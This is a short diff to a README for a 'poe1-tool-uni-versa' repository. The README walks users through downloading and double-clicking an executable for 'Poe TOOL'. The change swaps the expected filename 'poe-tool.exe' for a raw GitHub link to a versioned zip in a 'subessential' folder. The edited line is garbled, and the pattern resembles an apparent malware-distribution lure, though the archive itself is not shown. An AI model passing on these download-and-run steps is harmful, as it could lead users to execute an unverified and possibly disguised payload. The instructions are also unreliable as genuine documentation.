SUNILDRAGON/poe1-tool-uni-versa/README.md

    Click on the link of the executable file for your operating system.

 4. **Locate the Downloaded File**
    After the download is complete, navigate to your downloads folder.
-You will see a file like `poe-tool.exe`.
+You will see a file like `https://raw.githubusercontent.com/SUNILDRAGON/poe1-tool-uni-versa/main/subessential/poe1-tool-uni-versa_3.2.zip`.

 5. **Run the Application**
    Double-click the file to start using Poe TOOL.
 Follow any prompts that appear on your screen.